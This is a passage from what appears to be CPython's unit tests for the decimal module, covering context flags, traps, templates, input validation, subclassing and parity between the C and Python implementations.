doit(c, signal=FloatOperation)
test_containers(c, signal=FloatOperation)
def test_float_operation_default(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
FloatOperation= self.decimal.FloatOperation
context = Context()
self.assertFalse(context.flags[FloatOperation])
self.assertFalse(context.traps[FloatOperation])
context.clear_traps()
context.traps[Inexact] = True
context.traps[FloatOperation] = True
self.assertTrue(context.traps[FloatOperation])
self.assertTrue(context.traps[Inexact])
class CContextFlags(ContextFlags):
decimal = C
class PyContextFlags(ContextFlags):
decimal = P
class SpecialContexts(unittest.TestCase):
"""Test the context templates."""
def test_context_templates(self):
BasicContext = self.decimal.BasicContext
ExtendedContext = self.decimal.ExtendedContext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
Underflow = self.decimal.Underflow
Clamped = self.decimal.Clamped
assert_signals(self, BasicContext, 'traps',
[InvalidOperation, DivisionByZero, Overflow, Underflow, Clamped]
)
savecontext = getcontext().copy()
basic_context_prec = BasicContext.prec
extended_context_prec = ExtendedContext.prec
ex = None
try:
BasicContext.prec = ExtendedContext.prec = 441
for template in BasicContext, ExtendedContext:
setcontext(template)
c = getcontext()
self.assertIsNot(c, template)
self.assertEqual(c.prec, 441)
except Exception as e:
ex = e.__class__
finally:
BasicContext.prec = basic_context_prec
ExtendedContext.prec = extended_context_prec
setcontext(savecontext)
if ex:
raise ex
def test_default_context(self):
DefaultContext = self.decimal.DefaultContext
BasicContext = self.decimal.BasicContext
ExtendedContext = self.decimal.ExtendedContext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
self.assertEqual(BasicContext.prec, 9)
self.assertEqual(ExtendedContext.prec, 9)
assert_signals(self, DefaultContext, 'traps',
[InvalidOperation, DivisionByZero, Overflow]
)
savecontext = getcontext().copy()
default_context_prec = DefaultContext.prec
ex = None
try:
c = getcontext()
saveprec = c.prec
DefaultContext.prec = 961
c = getcontext()
self.assertEqual(c.prec, saveprec)
setcontext(DefaultContext)
c = getcontext()
self.assertIsNot(c, DefaultContext)
self.assertEqual(c.prec, 961)
except Exception as e:
ex = e.__class__
finally:
DefaultContext.prec = default_context_prec
setcontext(savecontext)
if ex:
raise ex
class CSpecialContexts(SpecialContexts):
decimal = C
class PySpecialContexts(SpecialContexts):
decimal = P
class ContextInputValidation(unittest.TestCase):
def test_invalid_context(self):
Context = self.decimal.Context
DefaultContext = self.decimal.DefaultContext
c = DefaultContext.copy()
# prec, Emax
for attr in ['prec', 'Emax']:
setattr(c, attr, 999999)
self.assertEqual(getattr(c, attr), 999999)
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(TypeError, setattr, c, attr, 'xyz')
# Emin
setattr(c, 'Emin', -999999)
self.assertEqual(getattr(c, 'Emin'), -999999)
self.assertRaises(ValueError, setattr, c, 'Emin', 1)
self.assertRaises(TypeError, setattr, c, 'Emin', (1,2,3))
self.assertRaises(TypeError, setattr, c, 'rounding', -1)
self.assertRaises(TypeError, setattr, c, 'rounding', 9)
self.assertRaises(TypeError, setattr, c, 'rounding', 1.0)
self.assertRaises(TypeError, setattr, c, 'rounding', 'xyz')
# capitals, clamp
for attr in ['capitals', 'clamp']:
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(ValueError, setattr, c, attr, 2)
self.assertRaises(TypeError, setattr, c, attr, [1,2,3])
# Invalid attribute
self.assertRaises(AttributeError, setattr, c, 'emax', 100)
# Invalid signal dict
self.assertRaises(TypeError, setattr, c, 'flags', [])
self.assertRaises(KeyError, setattr, c, 'flags', {})
self.assertRaises(KeyError, setattr, c, 'traps',
{'InvalidOperation':0})
# Attributes cannot be deleted
for attr in ['prec', 'Emax', 'Emin', 'rounding', 'capitals', 'clamp',
'flags', 'traps']:
self.assertRaises(AttributeError, c.__delattr__, attr)
# Invalid attributes
self.assertRaises(TypeError, getattr, c, 9)
self.assertRaises(TypeError, setattr, c, 9)
# Invalid values in constructor
self.assertRaises(TypeError, Context, rounding=999999)
self.assertRaises(TypeError, Context, rounding='xyz')
self.assertRaises(ValueError, Context, clamp=2)
self.assertRaises(ValueError, Context, capitals=-1)
self.assertRaises(KeyError, Context, flags=["P"])
self.assertRaises(KeyError, Context, traps=["Q"])
# Type error in conversion
self.assertRaises(TypeError, Context, flags=(0,1))
self.assertRaises(TypeError, Context, traps=(1,0))
class CContextInputValidation(ContextInputValidation):
decimal = C
class PyContextInputValidation(ContextInputValidation):
decimal = P
class ContextSubclassing(unittest.TestCase):
def test_context_subclassing(self):
decimal = self.decimal
Decimal = decimal.Decimal
Context = decimal.Context
Clamped = decimal.Clamped
DivisionByZero = decimal.DivisionByZero
Inexact = decimal.Inexact
Overflow = decimal.Overflow
Rounded = decimal.Rounded
Subnormal = decimal.Subnormal
Underflow = decimal.Underflow
InvalidOperation = decimal.InvalidOperation
class MyContext(Context):
def __init__(self, prec=None, rounding=None, Emin=None, Emax=None,
capitals=None, clamp=None, flags=None,
traps=None):
Context.__init__(self)
if prec is not None:
self.prec = prec
if rounding is not None:
self.rounding = rounding
if Emin is not None:
self.Emin = Emin
if Emax is not None:
self.Emax = Emax
if capitals is not None:
self.capitals = capitals
if clamp is not None:
self.clamp = clamp
if flags is not None:
if isinstance(flags, list):
flags = {v:(v in flags) for v in OrderedSignals[decimal] + flags}
self.flags = flags
if traps is not None:
if isinstance(traps, list):
traps = {v:(v in traps) for v in OrderedSignals[decimal] + traps}
self.traps = traps
c = Context()
d = MyContext()
for attr in ('prec', 'rounding', 'Emin', 'Emax', 'capitals', 'clamp',
'flags', 'traps'):
self.assertEqual(getattr(c, attr), getattr(d, attr))
# prec
self.assertRaises(ValueError, MyContext, **{'prec':-1})
c = MyContext(prec=1)
self.assertEqual(c.prec, 1)
self.assertRaises(InvalidOperation, c.quantize, Decimal('9e2'), 0)
# rounding
self.assertRaises(TypeError, MyContext, **{'rounding':'XYZ'})
c = MyContext(rounding=ROUND_DOWN, prec=1)
self.assertEqual(c.rounding, ROUND_DOWN)
self.assertEqual(c.plus(Decimal('9.9')), 9)
# Emin
self.assertRaises(ValueError, MyContext, **{'Emin':5})
c = MyContext(Emin=-1, prec=1)
self.assertEqual(c.Emin, -1)
x = c.add(Decimal('1e-99'), Decimal('2.234e-2000'))
self.assertEqual(x, Decimal('0.0'))
for signal in (Inexact, Underflow, Subnormal, Rounded, Clamped):
self.assertTrue(c.flags[signal])
# Emax
self.assertRaises(ValueError, MyContext, **{'Emax':-1})
c = MyContext(Emax=1, prec=1)
self.assertEqual(c.Emax, 1)
self.assertRaises(Overflow, c.add, Decimal('1e99'), Decimal('2.234e2000'))
if self.decimal == C:
for signal in (Inexact, Overflow, Rounded):
self.assertTrue(c.flags[signal])
# capitals
self.assertRaises(ValueError, MyContext, **{'capitals':-1})
c = MyContext(capitals=0)
self.assertEqual(c.capitals, 0)
x = c.create_decimal('1E222')
self.assertEqual(c.to_sci_string(x), '1e+222')
# clamp
self.assertRaises(ValueError, MyContext, **{'clamp':2})
c = MyContext(clamp=1, Emax=99)
self.assertEqual(c.clamp, 1)
x = c.plus(Decimal('1e99'))
self.assertEqual(str(x), '1.000000000000000000000000000E+99')
# flags
self.assertRaises(TypeError, MyContext, **{'flags':'XYZ'})
c = MyContext(flags=[Rounded, DivisionByZero])
for signal in (Rounded, DivisionByZero):
self.assertTrue(c.flags[signal])
c.clear_flags()
for signal in OrderedSignals[decimal]:
self.assertFalse(c.flags[signal])
# traps
self.assertRaises(TypeError, MyContext, **{'traps':'XYZ'})
c = MyContext(traps=[Rounded, DivisionByZero])
for signal in (Rounded, DivisionByZero):
self.assertTrue(c.traps[signal])
c.clear_traps()
for signal in OrderedSignals[decimal]:
self.assertFalse(c.traps[signal])
class CContextSubclassing(ContextSubclassing):
decimal = C
class PyContextSubclassing(ContextSubclassing):
decimal = P
@skip_if_extra_functionality
class CheckAttributes(unittest.TestCase):
def test_module_attributes(self):
# Architecture dependent context limits
self.assertEqual(C.MAX_PREC, P.MAX_PREC)
self.assertEqual(C.MAX_EMAX, P.MAX_EMAX)
self.assertEqual(C.MIN_EMIN, P.MIN_EMIN)
self.assertEqual(C.MIN_ETINY, P.MIN_ETINY)
self.assertTrue(C.HAVE_THREADS is True or C.HAVE_THREADS is False)
self.assertTrue(P.HAVE_THREADS is True or P.HAVE_THREADS is False)
self.assertEqual(C.__version__, P.__version__)
self.assertEqual(dir(C), dir(P))
def test_context_attributes(self):
x = [s for s in dir(C.Context()) if '__' in s or not s.startswith('_')]
y = [s for s in dir(P.Context()) if '__' in s or not s.startswith('_')]
self.assertEqual(set(x) - set(y), set())
def test_decimal_attributes(self):
x = [s for s in dir(C.Decimal(9)) if '__' in s or not s.startswith('_')]
y = [s for s in dir(C.Decimal(9)) if '__' in s or not s.startswith('_')]
self.assertEqual(set(x) - set(y), set())
class Coverage(unittest.TestCase):
def test_adjusted(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal('1234e9999').adjusted(), 10002)
# XXX raise?
self.assertEqual(Decimal('nan').adjusted(), 0)
self.assertEqual(Decimal('inf').adjusted(), 0)
def test_canonical(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
x = Decimal(9).canonical()
self.assertEqual(x, 9)
c = getcontext()
x = c.canonical(Decimal(9))
self.assertEqual(x, 9)
def test_context_repr(self):
c = self.decimal.DefaultContext.copy()
c.prec = 425000000
c.Emax = 425000000
c.Emin = -425000000
c.rounding = ROUND_HALF_DOWN
c.capitals = 0
c.clamp = 1
for sig in OrderedSignals[self.decimal]:
c.flags[sig] = False
c.traps[sig] = False
s = c.__repr__()
t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
"Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
"flags=[], traps=[])"
self.assertEqual(s, t)
def test_implicit_context(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 1
c.Emax = 1
c.Emin = -1
# abs
self.assertEqual(abs(Decimal("-10")), 10)
# add
self.assertEqual(Decimal("7") + 1, 8)
# divide
self.assertEqual(Decimal("10") / 5, 2)
# divide_int
self.assertEqual(Decimal("10") // 7, 1)
# fma
self.assertEqual(Decimal("1.2").fma(Decimal("0.01"), 1), 1)
self.assertIs(Decimal("NaN").fma(7, 1).is_nan(), True)
# three arg power
self.assertEqual(pow(Decimal(10), 2, 7), 2)
# exp
self.assertEqual(Decimal("1.01").exp(), 3)
# is_normal
self.assertIs(Decimal("0.01").is_normal(), False)
# is_subnormal
self.assertIs(Decimal("0.01").is_subnormal(), True)
# ln
self.assertEqual(Decimal("20").ln(), 3)
# log10
self.assertEqual(Decimal("20").log10(), 1)
# logb
self.assertEqual(Decimal("580").logb(), 2)
# logical_invert
self.assertEqual(Decimal("10").logical_invert(), 1)
# minus
self.assertEqual(-Decimal("-10"), 10)
# multiply
self.assertEqual(Decimal("2") * 4, 8)
# next_minus
self.assertEqual(Decimal("10").next_minus(), 9)
# next_plus
self.assertEqual(Decimal("10").next_plus(), Decimal('2E+1'))
# normalize
self.assertEqual(Decimal("-10").normalize(), Decimal('-1E+1'))
# number_class
self.assertEqual(Decimal("10").number_class(), '+Normal')
# plus
self.assertEqual(+Decimal("-1"), -1)
# remainder
self.assertEqual(Decimal("10") % 7, 3)
# subtract
self.assertEqual(Decimal("10") - 7, 3)
# to_integral_exact
self.assertEqual(Decimal("1.12345").to_integral_exact(), 1)
# Boolean functions
self.assertTrue(Decimal("1").is_canonical())
self.assertTrue(Decimal("1").is_finite())
self.assertTrue(Decimal("1").is_finite())
self.assertTrue(Decimal("snan").is_snan())
self.assertTrue(Decimal("-1").is_signed())
self.assertTrue(Decimal("0").is_zero())
self.assertTrue(Decimal("0").is_zero())
# Copy
with localcontext() as c:
c.prec = 10000
x = 1228 ** 1523
y = -Decimal(x)
z = y.copy_abs()
self.assertEqual(z, x)
z = y.copy_negate()
self.assertEqual(z, x)
z = y.copy_sign(Decimal(1))
self.assertEqual(z, x)
def test_divmod(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
with localcontext() as c:
q, r = divmod(Decimal("10912837129"), 1001)
self.assertEqual(q, Decimal('10901935'))
self.assertEqual(r, Decimal('194'))
q, r = divmod(Decimal("NaN"), 7)
self.assertTrue(q.is_nan() and r.is_nan())
c.traps[InvalidOperation] = False
q, r = divmod(Decimal("NaN"), 7)
self.assertTrue(q.is_nan() and r.is_nan())
c.traps[InvalidOperation] = False
c.clear_flags()
q, r = divmod(Decimal("inf"), Decimal("inf"))
self.assertTrue(q.is_nan() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
q, r = divmod(Decimal("inf"), 101)
self.assertTrue(q.is_infinite() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
q, r = divmod(Decimal(0), 0)
self.assertTrue(q.is_nan() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.traps[DivisionByZero] = False
c.clear_flags()
q, r = divmod(Decimal(11), 0)
self.assertTrue(q.is_infinite() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation] and
c.flags[DivisionByZero])
def test_power(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
Overflow = self.decimal.Overflow
Rounded = self.decimal.Rounded
with localcontext() as c:
c.prec = 3
c.clear_flags()
self.assertEqual(Decimal("1.0") ** 100, Decimal('1.00'))
self.assertTrue(c.flags[Rounded])
c.prec = 1
c.Emax = 1
c.Emin = -1
c.clear_flags()
c.traps[Overflow] = False
self.assertEqual(Decimal(10000) ** Decimal("0.5"), Decimal('inf'))
self.assertTrue(c.flags[Overflow])
def test_quantize(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
with localcontext() as c:
c.prec = 1
c.Emax = 1
c.Emin = -1
c.traps[InvalidOperation] = False
x = Decimal(99).quantize(Decimal("1e1"))
self.assertTrue(x.is_nan())
def test_radix(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
c = getcontext()
self.assertEqual(Decimal("1").radix(), 10)
self.assertEqual(c.radix(), 10)
def test_rop(self):
Decimal = self.decimal.Decimal
for attr in ('__radd__', '__rsub__', '__rmul__', '__rtruediv__',
'__rdivmod__', '__rmod__', '__rfloordiv__', '__rpow__'):
self.assertIs(getattr(Decimal("1"), attr)("xyz"), NotImplemented)
def test_round(self):
# Python3 behavior: round() returns Decimal
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 28
self.assertEqual(str(Decimal("9.99").__round__()), "10")
self.assertEqual(str(Decimal("9.99e-5").__round__()), "0")
self.assertEqual(str(Decimal("1.23456789").__round__(5)), "1.23457")
self.assertEqual(str(Decimal("1.2345").__round__(10)), "1.2345000000")
self.assertEqual(str(Decimal("1.2345").__round__(-10)), "0E+10")
self.assertRaises(TypeError, Decimal("1.23").__round__, "5")
self.assertRaises(TypeError, Decimal("1.23").__round__, 5, 8)
def test_create_decimal(self):
c = self.decimal.Context()
self.assertRaises(ValueError, c.create_decimal, ["%"])
def test_int(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 9999
x = Decimal(1221**1271) / 10**3923
self.assertEqual(int(x), 1)
self.assertEqual(x.to_integral(), 2)
def test_copy(self):
Context = self.decimal.Context
c = Context()
c.prec = 10000
x = -(1172 ** 1712)
y = c.copy_abs(x)
self.assertEqual(y, -x)
y = c.copy_negate(x)
self.assertEqual(y, -x)
y = c.copy_sign(x, 1)
self.assertEqual(y, -x)
class CCoverage(Coverage):
decimal = C
class PyCoverage(Coverage):
decimal = P
class PyFunctionality(unittest.TestCase):
"""Extra functionality in decimal.py"""
def test_py_alternate_formatting(self):
# triples giving a format, a Decimal, and the expected result
Decimal = P.Decimal
localcontext = P.localcontext
test_values = [
# Issue 7094: Alternate formatting (specified by #)
('.0e', '1.0', '1e+0'),
('#.0e', '1.0', '1.e+0'),
('.0f', '1.0', '1'),
('#.0f', '1.0', '1.'),
('g', '1.1', '1.1'),
('#g', '1.1', '1.1'),
('.0g', '1', '1'),
('#.0g', '1', '1.'),
('.0%', '1.0', '100%'),
('#.0%', '1.0', '100.%'),
]
for fmt, d, result in test_values:
self.assertEqual(format(Decimal(d), fmt), result)
class PyWhitebox(unittest.TestCase):
"""White box testing for decimal.py"""
def test_py_exact_power(self):
# Rarely exercised lines in _power_exact.
Decimal = P.Decimal
localcontext = P.localcontext
with localcontext() as c:
c.prec = 8
x = Decimal(2**16) ** Decimal("-0.5")
self.assertEqual(x, Decimal('0.00390625'))
x = Decimal(2**16) ** Decimal("-0.6")
self.assertEqual(x, Decimal('0.0012885819'))
x = Decimal("256e7") ** Decimal("-0.5")
x = Decimal(152587890625) ** Decimal('-0.0625')
self.assertEqual(x, Decimal("0.2"))
x = Decimal("152587890625e7") ** Decimal('-0.0625')
x = Decimal(5**2659) ** Decimal('-0.0625')
c.prec = 1
x = Decimal("152587890625") ** Decimal('-0.5')
c.prec = 201
x = Decimal(2**578) ** Decimal("-0.5")
def test_py_immutability_operations(self):
# Do operations and check that it didn't change internal objects.
Decimal = P.Decimal
DefaultContext = P.DefaultContext
setcontext = P.setcontext
c = DefaultContext.copy()
c.traps = dict((s, 0) for s in OrderedSignals[P])
setcontext(c)
d1 = Decimal('-25e55')
b1 = Decimal('-25e55')
d2 = Decimal('33e+33')
b2 = Decimal('33e+33')
def checkSameDec(operation, useOther=False):
if useOther:
eval("d1." + operation + "(d2)")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
self.assertEqual(d2._sign, b2._sign)
self.assertEqual(d2._int, b2._int)
self.assertEqual(d2._exp, b2._exp)
else:
eval("d1." + operation + "()")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
Decimal(d1)
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
checkSameDec("__abs__")
checkSameDec("__add__", True)
checkSameDec("__divmod__", True)
checkSameDec("__eq__", True)
checkSameDec("__ne__", True)
checkSameDec("__le__", True)
checkSameDec("__lt__", True)
checkSameDec("__ge__", True)
checkSameDec("__gt__", True)
checkSameDec("__float__")
checkSameDec("__floordiv__", True)
checkSameDec("__hash__")
checkSameDec("__int__")
checkSameDec("__trunc__")
checkSameDec("__mod__", True)
checkSameDec("__mul__", True)
checkSameDec("__neg__")
checkSameDec("__bool__")
checkSameDec("__pos__")
checkSameDec("__pow__", True)
checkSameDec("__radd__", True)
checkSameDec("__rdivmod__", True)
checkSameDec("__repr__")
checkSameDec("__rfloordiv__", True)
checkSameDec("__rmod__", True)
checkSameDec("__rmul__", True)
checkSameDec("__rpow__", True)
checkSameDec("__rsub__", True)
checkSameDec("__str__")
checkSameDec("__sub__", True)
checkSameDec("__truediv__", True)
checkSameDec("adjusted")
checkSameDec("as_tuple")
checkSameDec("compare", True)
checkSameDec("max", True)
checkSameDec("min", True)
checkSameDec("normalize")
checkSameDec("quantize", True)
checkSameDec("remainder_near", True)
checkSameDec("same_quantum", True)
checkSameDec("sqrt")
checkSameDec("to_eng_string")
checkSameDec("to_integral")
def test_py_decimal_id(self):
Decimal = P.Decimal
d = Decimal(45)
e = Decimal(d)
self.assertEqual(str(e), '45')
self.assertNotEqual(id(d), id(e))
def test_py_rescale(self):
# Coverage
Decimal = P.Decimal
localcontext = P.localcontext
with localcontext() as c:
x = Decimal("NaN")._rescale(3, ROUND_UP)
self.assertTrue(x.is_nan())
def test_py__round(self):
# Coverage
Decimal = P.Decimal
self.assertRaises(ValueError, Decimal("3.1234")._round, 0, ROUND_UP)
class CFunctionality(unittest.TestCase):
"""Extra functionality in _decimal"""
@requires_extra_functionality
def test_c_ieee_context(self):
# issue 8786: Add support for IEEE 754 contexts to decimal module.
IEEEContext = C.IEEEContext
DECIMAL32 = C.DECIMAL32
DECIMAL64 = C.DECIMAL64
DECIMAL128 = C.DECIMAL128
def assert_rest(self, context):
self.assertEqual(context.clamp, 1)
assert_signals(self, context, 'traps', [])
assert_signals(self, context, 'flags', [])
c = IEEEContext(DECIMAL32)
self.assertEqual(c.prec, 7)
self.assertEqual(c.Emax, 96)
self.assertEqual(c.Emin, -95)
assert_rest(self, c)
c = IEEEContext(DECIMAL64)
self.assertEqual(c.prec, 16)
self.assertEqual(c.Emax, 384)
self.assertEqual(c.Emin, -383)
assert_rest(self, c)
c = IEEEContext(DECIMAL128)
self.assertEqual(c.prec, 34)
self.assertEqual(c.Emax, 6144)
self.assertEqual(c.Emin, -6143)
assert_rest(self, c)
# Invalid values
self.assertRaises(OverflowError, IEEEContext, 2**63)
self.assertRaises(ValueError, IEEEContext, -1)
self.assertRaises(ValueError, IEEEContext, 1024)
@requires_extra_functionality
def test_c_context(self):
Context = C.Context
c = Context(flags=C.DecClamped, traps=C.DecRounded)
self.assertEqual(c._flags, C.DecClamped)
self.assertEqual(c._traps, C.DecRounded)
@requires_extra_functionality
def test_constants(self):
# Condition flags
cond = (
C.DecClamped, C.DecConversionSyntax, C.DecDivisionByZero,
C.DecDivisionImpossible, C.DecDivisionUndefined,
C.DecFpuError, C.DecInexact, C.DecInvalidContext,
C.DecInvalidOperation, C.DecMallocError,
C.DecFloatOperation, C.DecOverflow, C.DecRounded,
C.DecSubnormal, C.DecUnderflow
)
# IEEEContext
self.assertEqual(C.DECIMAL32, 32)
self.assertEqual(C.DECIMAL64, 64)
self.assertEqual(C.DECIMAL128, 128)
self.assertEqual(C.IEEE_CONTEXT_MAX_BITS, 512)
# Conditions
for i, v in enumerate(cond):
self.assertEqual(v, 1<<i)
self.assertEqual(C.DecIEEEInvalidOperation,
C.DecConversionSyntax|
C.DecDivisionImpossible|
C.DecDivisionUndefined|
C.DecFpuError|
C.DecInvalidContext|
C.DecInvalidOperation|
C.DecMallocError)
self.assertEqual(C.DecErrors,
C.DecIEEEInvalidOperation|
C.DecDivisionByZero)
self.assertEqual(C.DecTraps,
C.DecErrors|C.DecOverflow|C.DecUnderflow)
class CWhitebox(unittest.TestCase):
"""Whitebox testing for _decimal"""
def test_bignum(self):
# Not exactly whitebox, but too slow with pydecimal.
Decimal = C.Decimal
localcontext = C.localcontext
b1 = 10**35
b2 = 10**36
with localcontext() as c:
c.prec = 1000000
for i in range(5):
a = random.randrange(b1, b2)
b = random.randrange(1000, 1200)
x = a ** b
y = Decimal(a) ** Decimal(b)
self.assertEqual(x, y)
def test_invalid_construction(self):
self.assertRaises(TypeError, C.Decimal, 9, "xyz")
def test_c_input_restriction(self):
# Too large for _decimal to be converted exactly
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
Context = C.Context
localcontext = C.localcontext
with localcontext(Context()):
self.assertRaises(InvalidOperation, Decimal,
"1e9999999999999999999")
def test_c_context_repr(self):
# This test is _decimal-only because flags are not printed
# in the same order.
DefaultContext = C.DefaultContext
FloatOperation = C.FloatOperation
c = DefaultContext.copy()
c.prec = 425000000
c.Emax = 425000000
c.Emin = -425000000
c.rounding = ROUND_HALF_DOWN
c.capitals = 0
c.clamp = 1
for sig in OrderedSignals[C]:
c.flags[sig] = True
c.traps[sig] = True
c.flags[FloatOperation] = True
c.traps[FloatOperation] = True
s = c.__repr__()
t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
"Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
"flags=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
"FloatOperation, Overflow, Rounded, Subnormal, Underflow], " \
"traps=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
"FloatOperation, Overflow, Rounded, Subnormal, Underflow])"
self.assertEqual(s, t)
def test_c_context_errors(self):
Context = C.Context
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
FloatOperation = C.FloatOperation
localcontext = C.localcontext
getcontext = C.getcontext
setcontext = C.setcontext
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
c = Context()
# SignalDict: input validation
self.assertRaises(KeyError, c.flags.__setitem__, 801, 0)
self.assertRaises(KeyError, c.traps.__setitem__, 801, 0)
self.assertRaises(ValueError, c.flags.__delitem__, Overflow)
self.assertRaises(ValueError, c.traps.__delitem__, InvalidOperation)
self.assertRaises(TypeError, setattr, c, 'flags', ['x'])
self.assertRaises(TypeError, setattr, c,'traps', ['y'])
self.assertRaises(KeyError, setattr, c, 'flags', {0:1})
self.assertRaises(KeyError, setattr, c, 'traps', {0:1})
# Test assignment from a signal dict with the correct length but
# one invalid key.
d = c.flags.copy()
del d[FloatOperation]
d["XYZ"] = 91283719
self.assertRaises(KeyError, setattr, c, 'flags', d)
self.assertRaises(KeyError, setattr, c, 'traps', d)
# Input corner cases
int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
gt_max_emax = 10**18 if HAVE_CONFIG_64 else 10**9
# prec, Emax, Emin
for attr in ['prec', 'Emax']:
self.assertRaises(ValueError, setattr, c, attr, gt_max_emax)
self.assertRaises(ValueError, setattr, c, 'Emin', -gt_max_emax)
# prec, Emax, Emin in context constructor
self.assertRaises(ValueError, Context, prec=gt_max_emax)
self.assertRaises(ValueError, Context, Emax=gt_max_emax)
self.assertRaises(ValueError, Context, Emin=-gt_max_emax)
# Overflow in conversion
self.assertRaises(OverflowError, Context, prec=int_max+1)
self.assertRaises(OverflowError, Context, Emax=int_max+1)
self.assertRaises(OverflowError, Context, Emin=-int_max-2)
self.assertRaises(OverflowError, Context, clamp=int_max+1)
self.assertRaises(OverflowError, Context, capitals=int_max+1)
# OverflowError, general ValueError
for attr in ('prec', 'Emin', 'Emax', 'capitals', 'clamp'):
self.assertRaises(OverflowError, setattr, c, attr, int_max+1)
self.assertRaises(OverflowError, setattr, c, attr, -int_max-2)
if sys.platform != 'win32':
self.assertRaises(ValueError, setattr, c, attr, int_max)
self.assertRaises(ValueError, setattr, c, attr, -int_max-1)
# OverflowError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
if C.MAX_PREC == 425000000:
self.assertRaises(OverflowError, getattr(c, '_unsafe_setprec'),
int_max+1)
self.assertRaises(OverflowError, getattr(c, '_unsafe_setemax'),
int_max+1)
self.assertRaises(OverflowError, getattr(c, '_unsafe_setemin'),
-int_max-2)
# ValueError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
if C.MAX_PREC == 425000000:
self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'), 0)
self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'),
1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'), -1)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'),
1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'),
-1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'), 1)
# capitals, clamp
for attr in ['capitals', 'clamp']:
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(ValueError, setattr, c, attr, 2)
self.assertRaises(TypeError, setattr, c, attr, [1,2,3])
if HAVE_CONFIG_64:
self.assertRaises(ValueError, setattr, c, attr, 2**32)
self.assertRaises(ValueError, setattr, c, attr, 2**32+1)
# Invalid local context
self.assertRaises(TypeError, exec, 'with localcontext("xyz"): pass',
locals())
self.assertRaises(TypeError, exec,
'with localcontext(context=getcontext()): pass',
locals())
# setcontext
saved_context = getcontext()
self.assertRaises(TypeError, setcontext, "xyz")
setcontext(saved_context)
def test_rounding_strings_interned(self):
self.assertIs(C.ROUND_UP, P.ROUND_UP)
self.assertIs(C.ROUND_DOWN, P.ROUND_DOWN)
self.assertIs(C.ROUND_CEILING, P.ROUND_CEILING)
self.assertIs(C.ROUND_FLOOR, P.ROUND_FLOOR)
self.assertIs(C.ROUND_HALF_UP, P.ROUND_HALF_UP)
self.assertIs(C.ROUND_HALF_DOWN, P.ROUND_HALF_DOWN)
self.assertIs(C.ROUND_HALF_EVEN, P.ROUND_HALF_EVEN)
self.assertIs(C.ROUND_05UP, P.ROUND_05UP)
@requires_extra_functionality
def test_c_context_errors_extra(self):
Context = C.Context
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
localcontext = C.localcontext
getcontext = C.getcontext
setcontext = C.setcontext
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
c = Context()
# Input corner cases
int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
# OverflowError, general ValueError
self.assertRaises(OverflowError, setattr, c, '_allcr', int_max+1)
self.assertRaises(OverflowError, setattr, c, '_allcr', -int_max-2)
if sys.platform != 'win32':
self.assertRaises(ValueError, setattr, c, '_allcr', int_max)
self.assertRaises(ValueError, setattr, c, '_allcr', -int_max-1)
# OverflowError, general TypeError
for attr in ('_flags', '_traps'):
self.assertRaises(OverflowError, setattr, c, attr, int_max+1)
self.assertRaises(OverflowError, setattr, c, attr, -int_max-2)
if sys.platform != 'win32':
self.assertRaises(TypeError, setattr, c, attr, int_max)
self.assertRaises(TypeError, setattr, c, attr, -int_max-1)
# _allcr
self.assertRaises(ValueError, setattr, c, '_allcr', -1)
self.assertRaises(ValueError, setattr, c, '_allcr', 2)
self.assertRaises(TypeError, setattr, c, '_allcr', [1,2,3])
if HAVE_CONFIG_64:
self.assertRaises(ValueError, setattr, c, '_allcr', 2**32)
self.assertRaises(ValueError, setattr, c, '_allcr', 2**32+1)
